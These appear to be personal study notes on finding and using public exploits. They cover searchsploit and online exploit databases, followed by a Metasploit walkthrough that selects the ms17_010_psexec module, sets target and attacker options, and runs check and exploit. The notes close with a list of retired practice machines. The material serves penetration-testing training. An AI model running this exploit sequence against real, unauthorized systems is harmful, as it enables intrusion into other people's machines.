4 - Public Exploits

- after identifying services and web apps running on ports using an `nmap` scan determine whether public exploits exists for those services and web apps # Public Exploit/Vuln Tools - google search - `searchsploit` local database of exploit PoCs that is part of `exploitdb` - `sudo apt install -y exploitdb` - `searchsploit openssh 7.2` ![[images/Pasted image 20250822083851.png]] - other online databases for exploit/vuln research: - exploit db - rapid7 db - vulnerability lab # Metasploit Framework (MSF) Primer - contains built-in exploits for many public vulns and provides an easy way to use these exploits against vulnerable targets - other features: - recon scripts to enumerate remote hosts and compromised targets - verification scripts to test the existence of a vuln without compromising a target - `meterpreter` - a tool to connect to shells and run commands on compromised targets - post-exploit and pivoting tools - `msfconsole` creates an interactive sub-shell for the MSF![[images/Pasted image 20250822192548.png]] - once MSF is running, we can search target app with the `search exploit` command ![[images/Pasted image 20250822192717.png]] - able to supply complex filters such as `cve:2009 type:exploit` - pull/select exploit from MSF's db with `use` command - `use exploit/windows/smb/ms17_010_psexec`![[images/Pasted image 20250822195013.png]] - before we can run the exploit, its options will need to be configured with the `show options` command ![[images/Pasted image 20250822194955.png]] - shows options that are required need to be set first for exploit to work - `RHOSTS` = IP of target(s) - `RPORT` = target port - `LHOST` = IP of attacker machine - `FILEPATH` = path to file to read ```bash #MSF sequence msfconsole #launch MSF in an interactive sub-shell search exploit <pattern> #able to supply complex filters use <exploit_name or \#> #select exploit from list show options #shows required options that need to be set before selected exploit can be run set RHOSTS target_IP set RPORT target_port set LHOST tun0 #sets attacker IP to VPN tunnel to target check #scans noted RHOSTS and determines whetehr they are vuln exploit #executes exploit against RHOSTS ``` - retired boxes to practice MSF - Granny/Grandpa - Jerry - Blue - Lame - Optimum - Legacy - Devel